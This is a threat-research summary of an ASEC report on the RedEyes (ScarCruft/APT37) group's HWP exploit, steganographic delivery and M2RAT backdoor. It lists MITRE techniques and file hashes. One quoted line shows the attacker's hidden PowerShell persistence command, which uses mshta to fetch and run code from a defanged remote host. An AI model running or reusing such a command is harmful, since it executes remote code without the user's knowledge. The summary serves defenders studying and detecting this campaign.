Threat Research

HWP Malware Using the Steganography Technique: RedEyes (ScarCruft) – ASEC BLOG

Securonix

ASEC reports that the RedEyes group (ScarCruft/APT37) targeted individuals in Korea by exploiting the CVE-2017-8291 HWP EPS vulnerability and delivering malware via steganography. They reveal a new backdoor, M2RAT (Map2RAT), that uses a shared memory channel and registry-based persistence to exfiltrate data and control infected devices, including mobile phones.
#RedEyes #ScarCruft #APT37 #M2RAT #Map2RAT #Chinotto #CVE-2017-8291 #HWP #EPS #Wallup

Keypoints

  • The RedEyes group targets individuals (not corporations) and steals personal PC and mobile data.
  • Attackers exploit the old HWP EPS vulnerability CVE-2017-8291 using steganography to distribute malware.
  • Steganography image was sourced from wallup.net to conceal the payload.
  • A new backdoor, M2RAT (Map2RAT), is deployed after the loader runs and is injected into explorer.exe, enabling remote control and exfiltration.
  • Persistence is achieved via a registry Run key (RyPO) to maintain a connection with the C2 server, similar to past ScarCruft activity.
  • The operation includes C2 communications, data exfiltration, and mobile data theft, with a focus on evading network detection.

MITRE Techniques

  • [T1203] Exploitation for Client Execution – The HWP EPS vulnerability allowed the threat actor’s shellcode to run through the third-party module. Quote: ‘the vulnerability allows the threat actor’s shellcode to run through the third-party module.’
  • [T1027.001] Steganography – The threat actor used the steganography technique to embed a malware strain within an image. Quote: ‘the threat actor used the steganography technique to embed a malware strain within an image.’
  • [T1218.005] Mshta – The registry Run key usage includes mshta to fetch/execute code. Quote: ‘mshta hxxps://www.*******elearning.or[.]kr/popup/handle/1.html’
  • [T1059.001] PowerShell – PowerShell commands are executed and hidden as part of persistence/command execution. Quote: ‘PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 340328 2.2.2.2 || mshta hxxps://www.*******elearning.or[.]kr/popup/handle/1.html’
  • [T1547.001] Registry Run Keys/Startup Folder – The lskdjfel.exe file registers a Run key to establish persistence. Quote: ‘The executed lskdjfel.exe file registers the following command to the registry Run key to establish a persistent connection with the threat actor’s server.’
  • [T1055] Process Injection – The backdoor is injected into explorer.exe. Quote: ‘The ultimately executed backdoor operates after being injected into explorer.exe.’
  • [T1071.001] Web Protocols – C2 communications occur via HTTP/POST body. Quote: ‘M2RAT’s C&C communications command system involves receiving commands from the threat actor’s server through the POST method’s Body.’
  • [T1140] Deobfuscate/Decode Files or Information – A 16-byte XOR key decodes the PE payload. Quote: ’16-byte XOR key is used for PE decoding to XOR 1 byte at a time.’

Indicators of Compromise

  • [MD5] Detection hashes for dropper/loader and components – 8b666fc04af6de45c804d973583c76e0, 93c66ee424daf4c5590e21182592672e, 7bab405fbc6af65680443ae95c30595d, 9083c1ff01ad8fabbcd8af1b63b77e66, 4488c709970833b5043c0b0ea2ec9fa9, 7f5a72be826ea2fe5f11a16da0178e54
  • [File] Filenames associated with stages – Form.hwp (EPS document triggering the exploit) and lskdjfel.exe (decrypted PE loader / backdoor launcher)

Read more: https://asec.ahnlab.com/en/48063/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint